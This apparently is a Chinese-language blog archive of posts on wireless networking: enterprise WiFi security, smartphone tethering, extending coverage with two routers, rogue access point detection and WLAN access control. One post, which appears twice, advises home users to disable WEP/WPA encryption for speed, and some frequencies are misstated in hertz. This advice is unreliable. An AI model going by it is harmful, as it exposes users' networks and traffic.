  要实现802.1X身份识别,你需要拥有一台RADIUS/AAA服务器。如果你在运行WindowsServer2008和以上版本的操作系统,你要考虑使用网络政策服务器(NPS)或者早期服务器版本的互联网身份识别服务(IAS)。如果你没有运行Windows服务器软件,你可以考虑使用开源FreeRADIUS服务器软件。
  如果你运行WindowsServer2008R2或以上版本,你可以通过组策略把802.1X设置到区域连接在一起的客户机。否则,你可以考虑采用第三方解决方案帮助配置这些客户机。  
  4.一定要保证802.1X客户机设置的安全
  WPA/WPA2的EAP模式仍然容易受到中间人攻击。然而,你可以通过保证客户机EAP设置的安全来阻止这些攻击。例如,在Windows的EAP设置中,你可以通过选择CA证书、指定服务器地址和禁止它提示用户信任新的服务器或者CA证书等方法实现服务器证书验证。
  你还可以通过组策略把802.1X设置推向区域连接在一起的客户机,或者使用Avenda公司的Quick1X等第三方解决方案。
  5.一定要使用一个无线入侵防御系统
  保证WiFi网络安全比抗击那些直设法获取网络访问权限的企图要做更多的事情。例如,黑客可以建立一个虚假的接入点或者实施拒绝服务攻击。要帮助检测和对抗这些攻击,你应该应用一个无线入侵防御系统(WIPS)。厂商直接的WIPS系统的设计和方法是不同的,但是,这些系统一般都监视虚假的接入点或者恶意行动,向你报警和可能阻止这些恶意行为。
  有许多商业厂商提供WIPS解决方案,如AirMagnet和AirTightNeworks。还有Snort等开源软件的选择。
  6.一定要应用NAP或者NAC
  除了802.11i和WIPS之外,你应该考虑应用一个NAP(网络接入保护)或者NAC(网络接入控制)解决方案。这些解决方案能够根据客户身份和执行定义的政策的情况对网络接入提供额外的控制。这些解决方案还包括隔离有问题的客户的能力以及提出补救措施让客户重新遵守法规的能力。
  有些NAC解决方案可能包括网络入侵防御和检测功能。但是,你要保证这个解决方案还专门提供无线保护功能。
  如果你的客户机在运行WindowsServer2008或以上版本以及WindowsVista或以上版本的操作系统,你可以使用微软的NAP功能。此外,你可以考虑第三方的解决方案,如开源软件的PacketFence。
  7.不要信任隐藏的SSID
  无线安全的一个不实的说法是关闭接入点的SSID播出将隐藏你的网络,或者至少可以隐藏你的SSID,让黑客很难找到你的网络。然而,这种做法只是从接入点信标中取消了SSID。它仍然包含在802.11相关的请求之中,在某些情况下还包含在探索请求和回应数据包中。因此,窃听者能够使用合法的无线分析器在繁忙的网络中迅速发现“隐藏的”SSID。
  一些人可能争辩说,关闭SSID播出仍然会提供另一层安全保护。但是,要记住,它能够对网络设置和性能产生负面影响。你必须手工向客户机输入SSID,这使客户机的配置更加复杂。这还会引起探索请求和回应数据包的增加,从而减少可用带宽。
  8.不要信任MAC地址过滤
  无线安全的另一个不实的说法是启用MAC(媒体接入控制)地址过滤将增加另一层安全,控制哪一个客户机能够连接到这个网络。这有一些真实性。但是,要记住,窃听者很容易监视网络中授权的MAC地址并且随后改变自己的计算机的MAC地址。
  因此,你不要以为MAC过滤能够为安全做许多事情而采用MAC地址过滤。不过,你可以把这种做法作为松散地控制用户可以使用哪一台客户机和设备进入网络的方法。但是,你还要考虑保持MAC列表处于最新状态所面临的管理难题。
  9.一定要限制SSID用户能够连接的网络
  许多网络管理员忽略了一个简单而具有潜在危险的安全风险:用户故意地或者非故意地连接到临近的或者非授权的无线网络,使自己的计算机向可能的入侵敞开大门。然而,过滤SSID是防止发生这种情况的一个途径。例如,在WindowsVista和以上版本中,你可以使用netshwlan指令向用户能够看到和连接的那些SSID增加过滤器。对于台式电脑来说,你可以拒绝你的无线网络的那些SSID以外的所有的SSID。对于笔记本电脑来说,你可以仅仅拒绝临近网络的SSID,让它们仍然连接到热点和它们自己的网络。
  10.一定要物理地保护网络组件的安全
  要记住,计算机安全并不仅仅是最新的技术和加密。物理地保证你的网络组件的安全同样重要。要保证接入点放置在接触不到的地方,如假吊顶上面或者考虑把接入点放置在一个保密的地方,然后在一个最佳地方使用一个天线。如果不安全,有人会轻松来到接入点并且把接入点重新设置到厂商默认值以开放这个接入点。
  11.不要忘记保护移动客户
  你的WiFi安全的担心不应该仅限于你的网络。使用智能手机、笔记本电脑和平板电脑的用户也许也要得到保护。但是,在他们连接到WiFi热点或者自己家里的路由器的时候会怎样呢?你要保证他们其它的WiFi连接也是安全的以防止入侵和窃听。
  遗憾的是保证WiFi连接外部的安全并不是一件容易的事情。这需要采取综合性的方法,如提供和推荐解决方案以及教育用户有关WiFi安全风险和防御措施等。
  首先,所有的笔记本电脑和上网本都应该有一个个人防火墙以防止入侵。如果你运行WindowsServe操作系统,你可以通过组策略强制执行这个功能,你还可以使用WindowsIntune等解决方案管理非范围内的名计算机。
  其次,你需要保证用户的互联网通讯是加密的以防止本地窃听,同时在其它网络上提供访问你的网络的VPN(虚拟专用网)接入。如果你不为这种应用使用内部的VPN,可以考虑使用HotspotShield或者Witopia等外包服务。对于iOS(iPhone、iPad和iPodTouch)和Android设备来说,你可以使用这些设备本地的VPN客户端软件。然而,对于黑莓和WindowsPhone7设备来说,你必须设置一个消息服务器并且设置这个设备使用自己的VPN客户端软件。
  你还应该保证你的面向互联网的服务是安全的,一旦用户在公共网络或者不可信任的网络上不能使用VPN的时候可以使用这个服务。例如,如果你提供你的局域网、广域网或者VPN以外的电子邮件地址,你要保证使用SSL加密以防止本地窃听者。在不可信任的网络中的窃听者能够捕获用户的登录证书或者信息
Jan
14
2012
Wifi叠接十二问  
  很多最新款智能手机已经内置了叠接功能, 其让手机的作用超出了通话,发送邮件和网上冲浪,然而并未得到广泛使用。手机可以成为移动热点,为其附近的电脑、平板和其他设备提供无线上网服务。
  In-Stat无线技术研究负责人Allen Nogee称,叠接技术让智能手机用户可以随时随地尽享无线网络而不需要携带其他额外的设备。
  这些手机就好像连接移动数据网络的移动热点设备,可以作为wifi路由为附近的用户分配带宽。当然,作为热点的手机需要为此付费。
  除此以外还需要了解什么吗?在与分析师,网络工程师和其他移动专家交谈过后,笔者罗列出了十二个常见的智能手机叠接技术问题,包括选项和运营商策略。此外,笔者在欧美多个地方使用了几个智能手机作为热点想看看实际使用效果。
  什么是叠接技术?
  叠接技术是指电脑或其他设备共享智能手机的互联网连接。可以通过一个USB电缆,一个蓝牙无线连接或是wifi连接来完成设备间的连接。本文关注的是wifi热点叠接因为它使用起来更方便而且可以同时服务多个用户——而且还因为现在所有笔记本和平板都内置wifi功能。
  热点手机如何工作?
  在连入移动手机数据网络后,智能手机可以通过wifi连接把自己的互联网连接分配给其他客户。任何带有wifi功能的电脑或平板都可以连接到此手机,而wifi路由就存在于智能手机中,因此不需要再携带其他设备。
  哪些手机支持wifi叠接技术?
  主流手机厂商的很多产品都支持此功能,包括安卓,黑莓,iOS,WebOS和WP;而且手机形状与大小也各异。目前,安卓提供的选择最多,有48种热点 模式可用。
  笔者在自己的办公室,家里,火车上和移动的车子中使用了手机热点。基本上,只要你的手机有移动数据连接,就可以作为热点手机使用。
  WiFi叠接技术会增加手机大小和重量吗?
  不会。WiFi叠接需要手机内置WiFi芯片,但是智能手机已经植入了这样的芯片,你可以在网吧或办公室进行连接。热点功能通过软件开启,所以不会增加手机重量。事实上,有些具备热点功能的手机仅重3.2盎司。
  安装起来麻烦吗?
  任何安装过WiFi路由或是使用过移动热点的人都可以开启WiFi叠接。要想把手机当作热点使用,首先要启动叠接应用。
  开启热点后,要输入网络名称对其进行配置,选择加密方式并指定一个密码。目前大多数热点手机都使用WPA2保护,因此其他人无法使用你的移动网络或是读取数据。只需几分钟就可完成安装。
  哪些用户可以连接到热点,同一时间可支持多少用户呢?
  一个手机热点可以与任何带有WiFi联网功能的设备连接,包括各种笔记本,iPad和各种安卓平板。
  手机可以为五到八位用户提供互联网连接,这要取决于网络连接模式。不过,用户一多,网速自然也就会变慢。
  连接速度可以达到什么水平?
  连接速度取决于很多因素,包括手机与最近信号发射塔的距离,网络的繁忙程度。一般来说应该可以达到100Kbps,不过300Kbps是合理的期望。
  如果是3G和4G网络,那么地理位置很重要,因为很多地方没有新网络的覆盖。你可以到运营商网站查询覆盖范围,然后看看在自己所处位置是否可以访问网络。
  一般来说,手机的WiFi信号可达100英尺,因此可以满足当前办公室,海滩甚至是最大号酒店套房的需求。要记住,和WiFi路由一样,你离热点距离越远,信号的强度和带宽都会减小。
  能够一边打电话一边使用热点功能吗?
  这要取决于手机本身以及所使用的网络。大多数4G手机可以满足此需求;CDMA网络的3G手机则不行;在HSPA 3G网络上运行的手机则是个大杂烩。如果这是一个很重要的需求,那么最好是咨询运营商看是否有特定的机型可以同时支持语音与数据传输功能。
  叠接技术怎样收费?
  每个网络的叠接收费都不同,所以很难进行比较。事先,最好咨询一下运营商,谨慎消费。
  可以使用第三方叠接应用取代运营商的订购费用吗?
  如果你不怕这样做可能出现的风险,且你的手机有内置WiFi功能,就可以下载并使用某些应用,如为iPhone开发的MyWi,为安卓开发的Android WiFi Tether或是为塞班开发的JoikuSpot Light WiFi Hotspot,下载这些应用并安装到手机中运行就可以开启热点了。这些应用与手机内置叠接应用的功效一样,只是没有运营商授权和收费而已。
  无疑,你使用这些不收费应用时,运营商是不乐意的,因为这减少了他们的收入,而且他们会对自己网络上的应用进行监控。有些运营商可能会关闭这类服务,有些可能让你自动升级到叠接计划并实施收费。要了解清楚运营商的服务条款,搞清楚自己的权利义务。
  这些手机在海外也可以作为热点使用吗?
  有些可以,有些不行,买之前就要确定这一点。通常,如果手机支持HSPA或HSPA+技术,那么在欧洲,澳洲,新西兰,以及非洲部分区域,亚洲和南美洲应该都不成问题。不过你可能要升级服务包,使其可以支持国际数据漫游。
  如果你去到的国家不在上述几个区域之内,In-Stat的Nogee推荐可以租用带热点功能的手机使用。例如,你可以租用HTC MyTouch 4G,这款手机适合任何欧盟国家以及瑞士,可同时为四个设备提供热点服务。租用的话,大概是12美元一天,80美元一周或是200美元一月,有500MB的流量包,适合短期使用。
  在不同国家的热点操作
  笔者自己携带使用Verizon网络的热点手机进行尝试。LG Revolution和摩托罗拉 Droid 3效果不错,但是对于不同的情境它们也可用。因为它可以用于Verizon 4G LTE网络,前者在美国等地有较强的速度优势,而后者速度稍慢,但是在欧洲效果不错。
  笔者在主页上点击了移动热点图标,两款手机都弹出了热点设置页面。配置完热点的网络名称后,将其配置为安全的WPA2加密,然后输入密码。这些设置一般一两分钟就可完成。
  笔者在纽约市测试了LG Revolution想看看它在Verizon 4G LTE网络上的性能。使用惠普笔记本接入该热点,经SpeedTest.net宽带基站测速,其下载速度达到了19.6Mbps,上传速度达到了4.5Mbps。而且其峰值更令人印象深刻:下载速度21Mbps,上传速度5.6Mbps。当然这些是在LTE下产生的数字。如果你在3G网络中使用,速度肯定要慢一些。
  下一步,测试了Verizon 3G网络下的摩托罗拉 Droid 3。虽然它达不到Revolution在LTE下的速度,但是它适合HSPA网络。在纽约市,Droid 3的平均下载和上传速度分别为1.4Mbps和747Kbps,下载峰值达到2.1Mbps,上传峰值为824Kbps。这是笔者常用有线宽带速度的一半,但是对于旅途中的用户而言,这个速度还是令人满意的。
  在去往密歇根的路上,笔者早晚都用Droid 3的叠接功能与惠普笔记本连接。其间,平均下载和上传速度分别为1.4Mbps和620Kbps,峰值分别为2.2Mbps和651Kbps。
  跨国旅行期间,平均下载速度为1.5Mbps,平均上传速度为640Kbps。笔者使用Droid 3热点连接惠普笔记本以及iPad,查看电子地图,听网络收音机,看视频,玩游戏并对一个网站进行升级。最惊讶的是发现在从伦敦开往巴黎的欧洲之星列车上,还有足够带宽看下一站的地图以及阅读新闻。
  这种数据消耗也有负面影响。使用Droid 3的热点功能,连接iPad播放在线视频会让电池在3小时15分钟左右就耗尽,而使用普通的数据传输,其电池可使用15小时左右。换言之,如果你要使用手机热点功能,请先确保随身携带充电器,而且要注意电耗。
Jan
14
2012
  
  利用无线接入点作为中继器扩展网络覆盖范围由于曾经多次遇到过这一问题,并且非常具有代表意义(还将节省大量费用);因此,我决定在这里将解决方案发布出来。情况是这样的:如果出现需要使用无线网络,但所处范围又太大,一台无线路由器无法实现完全覆盖的情况。并且,由于价格过于昂贵,所以,购买一台专业路由器(可以扩大覆盖范围)不属于可行的选择,而增强器的效果似乎又不好;这时间,为了让所有客户和员工都被同一张无线网络覆盖,应该采取什么样的措施?
  其实,这项工作其实是相当简单的。所有需要的设备和支持项目就是:
  ◆两台无线路由器。为了让工作更简单,我建议使用固件相同的同一类型。
  ◆一条可用的网络连接。
  ◆一台可以通过硬拔线连接到路由器上对配置进行调整的机器。
  由于每一种无线路由器的具体设置都是不同的,所以,在这里我就大概地描述一下。将通用方式转化为针对具体路由器的特定操作不是很困难的事情。
  先让我们确认一下要进行的操作:
  ◆为两台无线接入点(无线路由器)设置相同的服务集标识符,这样的话,覆盖范围就可以叠加起来。
  ◆在两台路由器上设置无线安全策略。
  ◆对路由器设置进行调整防止DHCP或频道方面出现冲突。
  现在,我们了解了工作的原理,开始部署吧!
  第一步:设置服务集标识符
  第一步也是最容易的步骤。所有要做的工作就是将两台路由器的SSID设定为相同的。这样的操作应该非常简洁明了。如果这些路由器采用了不同SSID的话,当一台移动设备的位置发生变化时,就可能会出现不得不选择加入新网络的情况。
  第二步:设置无线安全策略
  与第一步类似,在这里,需要为两台无线路由器设置相同的无线安全策略。这就意味着安全类型和密码都必须相同。如果设置存在差异的话,移动设备将无法实现在网络间无缝漫游。
  第三步:设置DHCP
  现在,操作开始变得有点难度了。我们需要对两台路由器进行设置,以保证IP地址得到了妥善处理,各自路由器的DHCP服务也不会产生冲突。这时,首先要做的事情就是为每台无线路由器分配一个静态IP地址。在这里我们选择的是192.168.100.*地址类型。我们决定将192.168.100.1的地址分配给网关了,所以,就需要使用192.168.100.2和192.168.100.3作为无线路由器的地址。现在我们将.2地址作为主无线路由器的地址,而.3作为辅助无线路由器的地址。接下来,就是另一个关键点了。当为路由器设置静态IP地址时,会希望同时只能使用一台路由器(或者说在网络中一次只能连接一台路由器)。因此,在启动路由器的时间,很可能会默认为192.168.100.1,所以,正确的做法应该是先打开第一台使用静态IP地址的路由器,然后再打开第二台使用静态IP地址的路由器。
  在静态IP地址集的情况下,我们需要使用DHCP分配地址。为了防止出现地址冲突,所以,只能由一台路由器提供DHCP服务。因此,在辅助路由器上的DHCP服务必须被关闭。而在第一台路由器上,就需要打开它,但也要进行设置,将地址分配的起点控制在192.168.100.4以后。千万不能容许它使用已经分配给辅助无线路由器使用的.3地址。
  最后,我们就可以对主无线路由器和辅助无线路由器的信道进行设置,防止出现使用同一信道引起冲突的情况(为了确保在信道方面不会出现问题,可以选择使用6和11信道)。
  第四步:安装并启用网络
  最后的工作,就是为两台路由器找到可以将建筑整体覆盖到无线网络中的位置。请务必牢记,在以太网中这两台路由器需要属于相互“可见”的。解决这一问题的最简单方法就是通过墙壁上的插座直接连接到网络上(采用和路由器相同的IP地址模式)。如果不能实现这种模式的话,就应该选择利用5类双绞线将它们连接起来(这一小项目在成本方面的投入接近于零)。当安装到位,并连接完成后,就可以启动设备,实现网络覆盖了。一旦开始运行,就可以使用移动设备连接到其中的一台路由器上。在建立连接后,就可以在房间中移动,确认覆盖范围的有效性。如果没有出现问题,那么,恭喜你了,这又可以节省不少费用了!
Wireless N.T | Tags: , | 0 , 1441 Ķ
Jul
15
2011
多接入点网络如何判断可靠传播信号
  
  如果一个区域内有两个或者更多的网络接入点,那么设备(比如:笔记本)怎么辨别从这些接入点发出的信号?
  首先,每个WiFi设备都有自己独特的物理地址,在出厂时已经设置好,也可以重新配置。比如一个Linksys WiFi 5赫兹无线接入点的物理地址可能是00:25:9C:57:0C:0F,这个地址包含在路由器发送的每帧里,所以其他无线设备可以区分是谁发送了这一帧。
  其次,每个WiFi网络都有自己的名字,叫做扩展服务集标识符(ESSID,通常也简称SSID)。比如,一个双频Linksys接入点可能有两个无线设备,每个有独立的物理地址但相同的SSID(这里称为NetA),这个SSID在用于建立无线连接的管理帧中,它包含由接入点发送的信号,用来传播它们支持的网络或者处理客户链入接入点的请求。
  现在,假如我们想在NetA旁安装另外一个接入点,注意是新建一个单独的网络。为了能做到这样,我们给新路由一个不同的SSID(比如NetB)。连接到NetA的客户收到的仍然是以前接入点的信号,而需要接入NetB的用户将要从新接入点接收信号,所以你应该改变默认的SSID接入点,以使世界范围内所有的linksys的SSID不冲突,冲突会导致意外连接。
  或者,假如我们想要安装第二个接入点,扩展网络。所以我们要给新接入口同样的SSID(NetA)。客户仍然收听的是NetA传出的信号,现在由新旧接入口一起发送。每个客户从最强的信号中辨别出发送端物理地址,处理相关请求。由此在客户端和“最好的”接入点中产生了一个中介,尽管新旧接入口是同样的SSID,中介产生后,发送的每个数据帧中就包含被选出的接入口的物理地址,使该接入口知道它负责处理那些帧,虽然其他接入口可能也会收到这些帧,但不会处理没有发给它的帧。
  注意其他一些影响客户端接入点交流的因素,比如,一个接收2.4赫兹频道的用户不会接收到5赫兹频道的接入口信号,虽然他们在同一个领域。因此每个设备必须接收相同频率,才能交流。而且,新802.11设备必须选择混合模式,以使旧版802.11设备能知道它们接听的是什么。最后,每当客户端需要接入新接入口,它必须符合接入口数据频率和安全需求,这就是为什么所有的接入口传播相同的SSID是如此重要,因为可以有相同的被支持的数据频率和安全设置。否则,客户端可能会不停的尝试连接,但连接不正确,而是连到其他接入口,导致连接不稳。
Jul
15
2011
无线路由器传输速率实际上并不如产品介绍上面的快,这是什么原因呢?难道是商家做的虚假标识吗?其实不然,真正的原因还让看看文章来具体了解下吧。

无线局域网,也被称为WLAN(Wireless LAN),已经成为越来越多用户采用的组网方式。无线网络安装十分方便,不需要重新布线。因此也不会破坏家庭原有装修,相比有线网络,无线网络要灵活得多。

在使用过程中,我们发现尽管WLAN没有的排线的麻烦,并且使用也很方便,但有时我们会发现其信号不太稳定,数据传输速度有变慢的现象,基本上很难达到相关所标称的无线路由器传输速度。比如一款标称为54Mbps(实际上无线路由器传输速率在20Mbps左右)的WLAN网络,但其显示传输速度只有11Mbps(实际传输速率在4Mbps左右)、5.5Mbps(实际传输速率在2Mbps左右)或更低,最到这种情况我们应该怎样处理呢?

首先我们先简单了解下无线网络数据传输速度变慢的原因,无线电波在空气中传播很容易被各种障碍物、干扰源给干扰,这就自然而然会造成WLAN传输速度变慢。此外无线网络的传输距离是有限的,尽管一般标称的无线路由器传输距离可以达到100~300米,但是在实际使用中如果有阻隔的话,这个距离会急剧缩短并会导致数据传输速度变慢。

知道了传输速度变慢的原因我们就可以有的放矢地来着手解决这个问题了。首先在布局的时候我们就要把握好,无线路由器与配备无线网卡的电脑之间最好能够通视,尽量避免它们之间有墙壁阻挡,特别是承重墙(钢筋水泥墙)。我们知道,为了减少对人体的辐射,无线路由器的功率一般都不大,因此在使用过程中很容量受到附近电子设备的干扰,因此在设置无线路由器的摆放位置时,我们一定要记得远离微波炉、冰箱等家电。

良好的天线也是确保路由器无线传输距离和稳定性的有效保证,一些高档无线路由器会使用双天线,一般来说多天线的产品总比单天线的产品在传输性能上更有保障,如果有可能我们尽量选择双天线或者更多天线的无线路由器。另外天线的增益大小对数据传输的影响也非常重要,普通路由器一般只标配了天线增益为2dBi全向天线,但是许多高性能的无线路由器配备的确是3dBi或5dBi全向天线。毫无疑问,同等环境下,采用5dBi全向天线的无线路由器的性能肯定要优于2-3dBi全向天线的产品。因此我们可以通过改用高增益的天线来改善无线信号状况。

无线路由器和网卡之间的配套也是提升无线数据传输速度的一个重要因素,我们知道,目前市场上无线传输标准有802.11G、G+、N、B等多种标准,比如我们使用的路由器采用的是108Mbps的802.11G +标准,但无线网卡使用的是11Mbps(802.11b)标准,因此在其实际速度肯定达不到108Mbps,这时我们就需要升级网卡以达到最好的兼容效果。在选购相关产品的时候,我们一定要选择采用相同标准的无线路由器和网卡,这样才能最大限度的减少兼容性问题的发生。

前面我们介绍的主要是硬件方面对于无线路由器传输速度的影响,在软件方面,合理的设置也有利于提供无线路由的数据传输速度。我们知道,现在绝大多数无线路由器都支持WEP或WPA加密,加密的采用虽然有效的提升家庭网络的保密性能,但其或多或少的会影响数据传输速度。

无线网络对于一般的家庭来说,WEP或WPA加密作用不大,因此我们可以关闭或禁用这项功能。此外有时我们可以通过连接互联网升级无线路由器的驱动来改善无线传输的性能。
Jun
4
2011
接入点可能会被某用户建立了一个,其目的是为了将一台笔记本电脑带到休息室后自己仍能访问互联网。内部的工程师也有可能安装一个无线路由器,自己搭建一个测试网络,但在测试结束后有可能忘了禁用这个无线网。这些建立未授权的接入点的人往往本身并没有什么恶意,但是这并不能说这些接入点没有危害。如果你认为攻击者并不会找无线连接或者不会利用这些连接,那么,不妨用谷歌搜索一下与TJX公司有关的危害,然后再检查一下自己的网络。

NetStumbler、 Kismet以及其它的一些软件工具对于确认区域内的接入点确实有用,但是,这些工具并不能提供太多的信息。你要问一问,你发现的这些接入点位于你的网络上吗,它位于公司的网络上吗,还是位于邻居的网络上?除非你的单位处于一个有很少单位的区域,那么,这些工具并不会告诉你所需要的方方面面。简言之,这些工具的作用是有限的。

另外一种选择是扫描你的网络,看看有没有不正常的MAC地址,虽然这种扫描有可能太费时,并且有可能会产生错误。这种方法常用于扫描注册到D-Link等设备的MAC地址,但是由于许多大企业收购了小厂商,此方法就未必有效。例如,由于思科收购了Linksys,故MAC地址显示为思科。如果你拥有单位里众所周知的MAC地址的清单,你可以扫描那些还没有得到许可的任何设备。但是,如果你并没有设备的详细清单,也就无法开始,这种方法就有可能不会太有效。即使你的网络清查很正常,MAC地址扫描也未必百分之百地有效。这是因为设备有可能在网络中移动,或者这些设备有可能不对Ping操作做出响应,或者这些设备有可能在扫描时关闭了电源。

有些无线接入点厂商将无赖接入点的检测功能内置到了其产品中。这种产品能够根据无线信号确认接入点,并借助网络跟踪AP。这种产品可以确认网络端口,并准许你控制它。不过,要注意,这些产品并不便宜。

不管你采用什么技术或技巧来追踪无赖接入点,其关键都在于经常搜寻。PCI DSS(付款卡行业数据安全标准)要求每个季度都要扫描,但是我们认为搜索得更频繁一些更好。你还要为在发现了未授权的接入点后该采取什么应对措施做好准备。

一定要慎重。如果用户需要搭建一个测试网络,IT可以花点儿时间提供一个开关,切不可“一棒子打死”。找到一个开关,将连接移过去。如果用户只是需要无线连接,不妨断开其设备,然后再向他解释使用该设备可能给公司带来的风险。更好的方案是,看看你是否可以在那个地方建立一个授权的无线接入,其它用户将会很喜欢的。如果你还没有编写关于未授权接入点的书面策略,那就赶紧动手吧,让整个单位的人都按照安全策略来上网,岂非乐事?
Wireless N.T | Tags: , | 0 , 1759 Ķ
May
26
2011
无线路由器传输速率实际上并不如产品介绍上面的快,这是什么原因呢?难道是商家做的虚假标识吗?其实不然,真正的原因还让看看文章来具体了解下吧。

无线局域网,也被称为WLAN(Wireless LAN),已经成为越来越多用户采用的组网方式。无线网络安装十分方便,不需要重新布线。因此也不会破坏家庭原有装修,相比有线网络,无线网络要灵活得多。

在使用过程中,我们发现尽管WLAN没有的排线的麻烦,并且使用也很方便,但有时我们会发现其信号不太稳定,数据传输速度有变慢的现象,基本上很难达到相关所标称的无线路由器传输速度。比如一款标称为54Mbps(实际上无线路由器传输速率在20Mbps左右)的WLAN网络,但其显示传输速度只有11Mbps(实际传输速率在4Mbps左右)、5.5Mbps(实际传输速率在2Mbps左右)或更低,最到这种情况我们应该怎样处理呢?

首先我们先简单了解下无线网络数据传输速度变慢的原因,无线电波在空气中传播很容易被各种障碍物、干扰源给干扰,这就自然而然会造成WLAN传输速度变慢。此外无线网络的传输距离是有限的,尽管一般标称的无线路由器传输距离可以达到100~300米,但是在实际使用中如果有阻隔的话,这个距离会急剧缩短并会导致数据传输速度变慢。

知道了传输速度变慢的原因我们就可以有的放矢地来着手解决这个问题了。首先在布局的时候我们就要把握好,无线路由器与配备无线网卡的电脑之间最好能够通视,尽量避免它们之间有墙壁阻挡,特别是承重墙(钢筋水泥墙)。我们知道,为了减少对人体的辐射,无线路由器的功率一般都不大,因此在使用过程中很容量受到附近电子设备的干扰,因此在设置无线路由器的摆放位置时,我们一定要记得远离微波炉、冰箱等家电。

良好的天线也是确保路由器无线传输距离和稳定性的有效保证,一些高档无线路由器会使用双天线,一般来说多天线的产品总比单天线的产品在传输性能上更有保障,如果有可能我们尽量选择双天线或者更多天线的无线路由器。另外天线的增益大小对数据传输的影响也非常重要,普通路由器一般只标配了天线增益为2dBi全向天线,但是许多高性能的无线路由器配备的确是3dBi或5dBi全向天线。毫无疑问,同等环境下,采用5dBi全向天线的无线路由器的性能肯定要优于2-3dBi全向天线的产品。因此我们可以通过改用高增益的天线来改善无线信号状况。

无线路由器和网卡之间的配套也是提升无线数据传输速度的一个重要因素,我们知道,目前市场上无线传输标准有802.11G、G+、N、B等多种标准,比如我们使用的路由器采用的是108Mbps的802.11G +标准,但无线网卡使用的是11Mbps(802.11b)标准,因此在其实际速度肯定达不到108Mbps,这时我们就需要升级网卡以达到最好的兼容效果。在选购相关产品的时候,我们一定要选择采用相同标准的无线路由器和网卡,这样才能最大限度的减少兼容性问题的发生。

前面我们介绍的主要是硬件方面对于无线路由器传输速度的影响,在软件方面,合理的设置也有利于提供无线路由的数据传输速度。我们知道,现在绝大多数无线路由器都支持WEP或WPA加密,加密的采用虽然有效的提升家庭网络的保密性能,但其或多或少的会影响数据传输速度。

无线网络对于一般的家庭来说,WEP或WPA加密作用不大,因此我们可以关闭或禁用这项功能。此外有时我们可以通过连接互联网升级无线路由器的驱动来改善无线传输的性能。
Wireless N.T | Tags: | 0 , 1460 Ķ
May
26
2011
在无线LAN认证系列文章的第一部分中,我们介绍了如何确保来宾无线网络安全。在第二部分,我们探讨无线LAN访问控制的方法,包括创建策略、设备识别和整合其他网络访问控制解决方案。

对于网络安全和无线LAN(WLAN)访问控制,企业已经取得了巨大的突破。最远可追溯到静态可破解的WEP密钥,然后是部署较强的认证和加密所需要的第三方Wi-Fi客户端和OS补丁。现在,一些Wi-Fi设备和现有的操作系统已经可以支持WPA2-Enterprise了,甚至电话等小型可识别设备也可提供支持。

即使有这样一些进步,(具备802.1X认证和AES加密的)WPA2-Enterprise仍然没有占据主导地位。802.1X需要整合很多组件,它们来自多个供应商,并且通常由不同部分管理。要想取得成功就必须要进行规划和协调,包括用户帐号管理、设备分配和网络整合。幸运的是,现在已经出现了更好的有助于解决无线LAN访问控制问题的工具。

从群组策略开始进行WLAN访问控制

虽然使用802.1X的企业往往能够很好地控制公司拥有的笔记本电脑,但这对其它无线设备则不可同日而语,特别是那些不由IT部门采购的设备。

IT经常会在发布笔记本电脑之前将它们添加到Active Directory,是通过使用Group Policy Objects自动配置802.1X参数来反映每个用户的组群成员身份而实现的。Windows 7、Vista和XP都支持802.1X群组策略,包括有线和无线客户,Microsoft Windows Server 2008 R2指南中有这方面的描述:

Access Group Policy Extensions for 802.1X Wired and Wireless

Configure 802.1X Wired Access Clients by using Group Policy Management

Configure 802.1X Wireless Access Clients by using Group Policy Management

但是目前大多数工作人员使用的一些无线设备往往都不是运行在Windows上,甚至也不是IT部门购买的。有些IT部门将这种员工自行购买的大量的智能手机和平板电脑作为来宾设备对待。例如,当CFO从他们的笔记本电脑登录到无线LAN上时,他们可能被要求连接到公司的SSID,并提供基于他们身份和角色的802.1X的登录信息来获得访问权限。然而,当CFO使用他们的个人iPad登录到无线LAN时,可能会连接到只提供因特网访问的来宾SSID。这对于那些还没有处理员工自行购买设备的公司而言是一个“权宜之计”,但是这并不是一个理想的长期策略。

通过设备识别实施WLAN访问控制策略

为了解决这个问题,大量的网络和安全产品目前都使用了设备识别技术。通过观察MAC地址、协议、请求和响应,人们可以猜测(有一定自信的)一个设备的制造商、模型和OS。然后这个“指纹”可以根据访问控制、设备分配和策略目的将设备映射到群组中。

目前,Aruba Networks所拥有的Amigopod  Visitor Management Appliance (VMA)就是一个设备识别工具。该装置可以监控设备使用公司网络所发送的DHCP和HTTP。例如,通过检查这些流量,VMA云,区分CFO的公司笔记本电脑和他个人iPad,可以将每个识别的设备映射到正确的访问策略上。CFO的笔记本电脑可能由于其可信任状态而得到更宽松的访问权限,而iPad则只限于企业的邮件和内部网站的访问。然而,这两种设备发送的所有数据将受到WPA2-Enterprise的保护,其中使用802.1X来控制公司SSID的访问。

这个例子还漏掉了一个问题:CFO的iPad如何配置才能访问公司的SSID?手动配置是一种可能,但是显然自动化分配会更好一些。

自动化的Wi-Fi客户分配和配置文件

在这个例子中,我们的CFO可能先将他的iPad连接到访客SSID,并且访问了提供VMA自动登入页面。VMA将为我们CFO的iPad生成一个配置文件,并通过邮件或SMS发送。通过点击所包含的URL,CFO可以安装802.1X参数和证书,从而使能够iPad访问公司的SSID。

事实上,现在很多产品都提供这种类型的自动化Wi-Fi客户端分配功能。对于iPad和其他iOS设备,Apple的iPhone Configuration Utility可以生成(可选择锁定和加密的)Wi-Fi配置文件,它们可以发送到用户,发布在网站上,或者通过支持iOS4原生MDM的移动设备管理器即时安装。

后者适用于AirWatch、BoxTone、MobileIron、Sybase和其他的类型的设备,可以与企业的Active Directory注册整合在一起,同时为每个已经批准的iPad生成证书。如果有一台iPad丢失了,那么所有安装的MDM文件(包括Wi-Fi设置)都会被删除。然而,MDM并不局限于支持Apple设备——其中很多都可以用来注册和分配Androids、BlackBerrys以及员工拥有的笔记本电脑和上网本。

整合802.1X认证和网络访问控制

由于有了一种有效新无线设备识别方法,在没有IT协助的情况下使用WPA2-Enterprise进行登记并为每个员工应用恰当的访问策略并不是一件困难的事。但是如果WPA2与NAC整合到一起,那么策略的实施效果更佳。

接入端(AP)和控制器经过简单的配置就可以将请求转发到802.1X认证服务器上——其中有很多甚至已经内置在使用本地帐户数据库的认证服务器上了。为了简化多个供应商设备的互操作性,Wi-Fi Alliance现在对所有WPA2-Enterprise 认证的产品进行了Extensible Authentication Protocol (EAP)类型测试,包括EAP-TLS、EAP-TTLS/MSCHAPv2、PEAPv0/EAP-MSCHAPv2、PEAPv1/EAP-GTC、EAP-SIM、EAP-AKA和EAP-FAST。

